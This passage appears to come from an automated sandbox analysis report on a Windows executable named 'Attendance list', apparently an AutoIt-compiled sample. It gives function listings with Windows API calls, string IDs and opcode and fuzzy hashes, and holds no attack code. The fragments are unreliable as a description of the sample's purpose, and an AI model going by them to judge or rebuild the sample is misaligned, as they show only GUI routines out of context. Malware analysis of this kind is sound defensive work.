                        • Instruction ID: e84c1fd990656123e7de34fdd40d7b8f94229f6ce613b2cfb1f5b1a3ca57f48c
                        • Opcode Fuzzy Hash: eb8154fae67113c7f92dee1963498583f064361333de9570e84cde57b780b807
                        • Instruction Fuzzy Hash: 61E1A07490521AABDF209F64CC88EEF7BBCFF09714F008155F919AA290DB748A85DF61
                        Function 00944B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00944C51
                        • GetDesktopWindow.USER32 ref: 00944C66
                        • GetWindowRect.USER32(00000000), ref: 00944C6D
                        • GetWindowLongW.USER32(?,000000F0), ref: 00944CCF
                        • DestroyWindow.USER32(?), ref: 00944CFB
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00944D24
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00944D42
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00944D68
                        • SendMessageW.USER32(?,00000421,?,?), ref: 00944D7D
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00944D90
                        • IsWindowVisible.USER32(?), ref: 00944DB0
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00944DCB
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00944DDF
                        • GetWindowRect.USER32(?,?), ref: 00944DF7
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00944E1D
                        • GetMonitorInfoW.USER32(00000000,?), ref: 00944E37
                        • CopyRect.USER32(?,?), ref: 00944E4E
                        • SendMessageW.USER32(?,00000412,00000000), ref: 00944EB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: cc1aaa35f637d589159b501813f2da3d8558c337a9be2a261565c5bfe5541e71
                        • Instruction ID: b4ce1994269de32257aa4b8558274fa9fb3d76842ec9446dd0a58dfc7d65ca61
                        • Opcode Fuzzy Hash: cc1aaa35f637d589159b501813f2da3d8558c337a9be2a261565c5bfe5541e71
                        • Instruction Fuzzy Hash: 23B15B71618341AFDB04DF64C849F6ABBE4FF85714F00891CF599AB2A1DB71E805CB92
                        Function 009246D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                        Download Yara Rule
                        APIs
                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009246E8
                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0092470E
                        • _wcscpy.LIBCMT ref: 0092473C
                        • _wcscmp.LIBCMT ref: 00924747
                        • _wcscat.LIBCMT ref: 0092475D
                        • _wcsstr.LIBCMT ref: 00924768
                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00924784
                        • _wcscat.LIBCMT ref: 009247CD
                        • _wcscat.LIBCMT ref: 009247D4
                        • _wcsncpy.LIBCMT ref: 009247FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 699586101-1459072770
                        • Opcode ID: 70fd29dfdb1a1ec19c732a4714fc852fcada57d5dfaa6b72112294fc6b7c1206
                        • Instruction ID: e60ad651e67b6f2b7f59680ccf45bf7224d94bd992798a6aa81a6d06bf487dff
                        • Opcode Fuzzy Hash: 70fd29dfdb1a1ec19c732a4714fc852fcada57d5dfaa6b72112294fc6b7c1206
                        • Instruction Fuzzy Hash: 484139326042517ADB10E7799C47EBF77ACEF83710F00416AF905E6182EF74A90196A6
                        Function 008C27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008C28BC
                        • GetSystemMetrics.USER32(00000007), ref: 008C28C4
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008C28EF
                        • GetSystemMetrics.USER32(00000008), ref: 008C28F7
                        • GetSystemMetrics.USER32(00000004), ref: 008C291C
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008C2939
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008C2949
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008C297C
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008C2990
                        • GetClientRect.USER32(00000000,000000FF), ref: 008C29AE
                        • GetStockObject.GDI32(00000011), ref: 008C29CA
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 008C29D5
                          • Part of subcall function 008C2344: GetCursorPos.USER32(?), ref: 008C2357
                          • Part of subcall function 008C2344: ScreenToClient.USER32(009867B0,?), ref: 008C2374
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000001), ref: 008C2399
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        • SetTimer.USER32(00000000,00000000,00000028,008C1256), ref: 008C29FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 56056e3b3847ae223a5b6df0e4e0750832d474e9a73f84f1c68f6da983f787b7
                        • Instruction ID: 6b771b84bff0933b29947c281b9d820d1c74bf43dd0c9a23b0730fcb37b578d2
                        • Opcode Fuzzy Hash: 56056e3b3847ae223a5b6df0e4e0750832d474e9a73f84f1c68f6da983f787b7
                        • Instruction Fuzzy Hash: 70B15A75A0420AAFDB14DFA8DD55FAE7BB4FB08314F108229FA15EA2D0DB74E940DB50
                        Function 00944069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 009440F6
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009441B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 3974292440-719923060
                        • Opcode ID: 77d3a2215a57da6ea47efd733bb3cbb3f555baf14f8a8d72803421128b86ea7f
                        • Instruction ID: ad7f6041fa0b8659c038365c9ff280a3072666c8155663c803948a635a6df911
                        • Opcode Fuzzy Hash: 77d3a2215a57da6ea47efd733bb3cbb3f555baf14f8a8d72803421128b86ea7f
                        • Instruction Fuzzy Hash: E7A18B302143059BCB14EF24C955F6AB3E5FF85324F14896CF8AA9B292DB74EC45CB52
                        Function 009352F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00935309
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00935314
                        • LoadCursorW.USER32(00000000,00007F00), ref: 0093531F
                        • LoadCursorW.USER32(00000000,00007F03), ref: 0093532A
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00935335
                        • LoadCursorW.USER32(00000000,00007F01), ref: 00935340
                        • LoadCursorW.USER32(00000000,00007F81), ref: 0093534B
                        • LoadCursorW.USER32(00000000,00007F88), ref: 00935356
                        • LoadCursorW.USER32(00000000,00007F80), ref: 00935361
                        • LoadCursorW.USER32(00000000,00007F86), ref: 0093536C
                        • LoadCursorW.USER32(00000000,00007F83), ref: 00935377
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00935382
                        • LoadCursorW.USER32(00000000,00007F82), ref: 0093538D
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00935398
                        • LoadCursorW.USER32(00000000,00007F04), ref: 009353A3
                        • LoadCursorW.USER32(00000000,00007F02), ref: 009353AE
                        • GetCursorInfo.USER32(?), ref: 009353BE
                        • GetLastError.KERNEL32(00000001,00000000), ref: 009353E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Cursor$Load$ErrorInfoLast
                        • String ID:
                        • API String ID: 3215588206-0
                        • Opcode ID: 6ba97c9d8c994b09539a7e5109187c13a27f80a22bf4c0373d80ff84cda4122a
                        • Instruction ID: b4b66ebe928892b3c2c8d37b2d474a08359b3229b0b09099f867dc73644d95d6
                        • Opcode Fuzzy Hash: 6ba97c9d8c994b09539a7e5109187c13a27f80a22bf4c0373d80ff84cda4122a
                        • Instruction Fuzzy Hash: 46417370E08319AADB109FBA8C49D6EFFB8EF55B50F10452FE509E7291DAB89400CE51
                        Function 0091AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091AAA5
                        • __swprintf.LIBCMT ref: 0091AB46
                        • _wcscmp.LIBCMT ref: 0091AB59
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0091ABAE
                        • _wcscmp.LIBCMT ref: 0091ABEA
                        • GetClassNameW.USER32(?,?,00000400), ref: 0091AC21
                        • GetDlgCtrlID.USER32(?), ref: 0091AC73
                        • GetWindowRect.USER32(?,?), ref: 0091ACA9
                        • GetParent.USER32(?), ref: 0091ACC7
                        • ScreenToClient.USER32(00000000), ref: 0091ACCE
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091AD48
                        • _wcscmp.LIBCMT ref: 0091AD5C
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0091AD82
                        • _wcscmp.LIBCMT ref: 0091AD96
                          • Part of subcall function 008E386C: _iswctype.LIBCMT ref: 008E3874
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                        • String ID: %s%u
                        • API String ID: 3744389584-679674701
                        • Opcode ID: 0a1e9700a39cf9e7d15d6bd2cfa6925b433e795e108a633ac447c19182244d3b
                        • Instruction ID: cabc3ae63bfa20112ac456815e10366d9492c24eb3cd0dcd73ead1c49c896b2a
                        • Opcode Fuzzy Hash: 0a1e9700a39cf9e7d15d6bd2cfa6925b433e795e108a633ac447c19182244d3b
                        • Instruction Fuzzy Hash: BCA1C97520565AABD714DE24D884FEAB7ACFF44315F008629F9A9C2190DB30ED85CB92
                        Function 0091B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0091B3DB
                        • _wcscmp.LIBCMT ref: 0091B3EC
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0091B414
                        • CharUpperBuffW.USER32(?,00000000), ref: 0091B431
                        • _wcscmp.LIBCMT ref: 0091B44F
                        • _wcsstr.LIBCMT ref: 0091B460
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0091B498
                        • _wcscmp.LIBCMT ref: 0091B4A8
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0091B4CF
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0091B518
                        • _wcscmp.LIBCMT ref: 0091B528
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0091B550
                        • GetWindowRect.USER32(00000004,?), ref: 0091B5B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        • Opcode ID: 8f092346d7d552ef415b8d9e30a9970d07924284ea044129314a71e156e1fd89
                        • Instruction ID: 6c14467f83d82b2efa3104130ffcf5ed3109ffc3e3af00f686b922a4f88df284
                        • Opcode Fuzzy Hash: 8f092346d7d552ef415b8d9e30a9970d07924284ea044129314a71e156e1fd89
                        • Instruction Fuzzy Hash: 0D81CF7120830A9BDB04DF14C885FAA7BEEFF94354F048569FD898A0A2DB34DD85CB61
                        Function 0091B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        • Opcode ID: ac8b51028f6623ea1f83d4795da4fcd1d54012bc68a0ad8143e70fb234ee0acc
                        • Instruction ID: 2a95cac52ed710c846bfce54dfca2ac7ca272251f66cddec775c879d42ff6251
                        • Opcode Fuzzy Hash: ac8b51028f6623ea1f83d4795da4fcd1d54012bc68a0ad8143e70fb234ee0acc
                        • Instruction Fuzzy Hash: E431E032A04209A6DB14FA65CD43FEE77B9FF21750F60492DB415B20E2EF31AE48C952
                        Function 0091C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000063), ref: 0091C4D4
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0091C4E6
                        • SetWindowTextW.USER32(?,?), ref: 0091C4FD
                        • GetDlgItem.USER32(?,000003EA), ref: 0091C512
                        • SetWindowTextW.USER32(00000000,?), ref: 0091C518
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C528
                        • SetWindowTextW.USER32(00000000,?), ref: 0091C52E
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0091C54F
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0091C569
                        • GetWindowRect.USER32(?,?), ref: 0091C572
                        • SetWindowTextW.USER32(?,?), ref: 0091C5DD
                        • GetDesktopWindow.USER32 ref: 0091C5E3
                        • GetWindowRect.USER32(00000000), ref: 0091C5EA
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0091C636
                        • GetClientRect.USER32(?,?), ref: 0091C643
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0091C668
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0091C693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: 1903c892ce46fccd18a675f5e14459ee07736d89ae5b7da741674632e45db296
                        • Instruction ID: b92a8555b50418aa11d960479ba488a3242850eaf547fb7f9de95929e968fb69
                        • Opcode Fuzzy Hash: 1903c892ce46fccd18a675f5e14459ee07736d89ae5b7da741674632e45db296
                        • Instruction Fuzzy Hash: CF516071A0470AAFDB20DFA8DD85FAFBBF5FF04705F004928E646A25A0D774A944DB50
                        Function 0094A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0094A4C8
                        • DestroyWindow.USER32(?,?), ref: 0094A542
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0094A5BC
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0094A5DE
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094A5F1
                        • DestroyWindow.USER32(00000000), ref: 0094A613
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008C0000,00000000), ref: 0094A64A
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094A663
                        • GetDesktopWindow.USER32 ref: 0094A67C
                        • GetWindowRect.USER32(00000000), ref: 0094A683
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0094A69B
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0094A6B3
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        • Opcode ID: db021fb38bcc1f9cef540ad12cf35692b0484f04c0fd560f6b061b93e4b81de0
                        • Instruction ID: 7580316f09d6cad54584b10769c6b49b061ee9542391f3d02dcd540ca546bed1
                        • Opcode Fuzzy Hash: db021fb38bcc1f9cef540ad12cf35692b0484f04c0fd560f6b061b93e4b81de0
                        • Instruction Fuzzy Hash: E971BC71194205AFD720CF28CC49F6A7BE9FB89304F49492CF9898B3A0D774E902DB12
                        Function 0094C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DragQueryPoint.SHELL32(?,?), ref: 0094C917
                          • Part of subcall function 0094ADF1: ClientToScreen.USER32(?,?), ref: 0094AE1A
                          • Part of subcall function 0094ADF1: GetWindowRect.USER32(?,?), ref: 0094AE90
                          • Part of subcall function 0094ADF1: PtInRect.USER32(?,?,0094C304), ref: 0094AEA0
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0094C980
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0094C98B
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0094C9AE
                        • _wcscat.LIBCMT ref: 0094C9DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0094C9F5
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0094CA0E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0094CA25
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0094CA47
                        • DragFinish.SHELL32(?), ref: 0094CA4E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0094CB41
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        • Opcode ID: 7fde0ea0708569e6b9ad1854090e990a796ac6f6552cb0d3bf9188fbcf8e093d
                        • Instruction ID: a8c792cc7f8733c4eddc5cab80e5accbd506d1cc619c16c0c74c967c388411f5
                        • Opcode Fuzzy Hash: 7fde0ea0708569e6b9ad1854090e990a796ac6f6552cb0d3bf9188fbcf8e093d
                        • Instruction Fuzzy Hash: 8D614871108301AFC711EF64CC89E9BBBF8FF89754F000A2EF595962A1DB709A49CB52
                        Function 00944619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 009446AB
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009446F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        • Opcode ID: 2368de235702169a81bbc15d151b2a68c79420eed273aa13d2ef1d46c8590d96
                        • Instruction ID: 44608bef7b4f941c13c8a318a9264430e3c1206816b4adf23b024dbc059d1d8a
                        • Opcode Fuzzy Hash: 2368de235702169a81bbc15d151b2a68c79420eed273aa13d2ef1d46c8590d96
                        • Instruction Fuzzy Hash: CE915E342047059BCB14EF14C851F6AB7A5FF85714F05889CF89A9B3A2CB75ED4ACB82
                        Function 0094BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0094BB6E
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00949431), ref: 0094BBCA
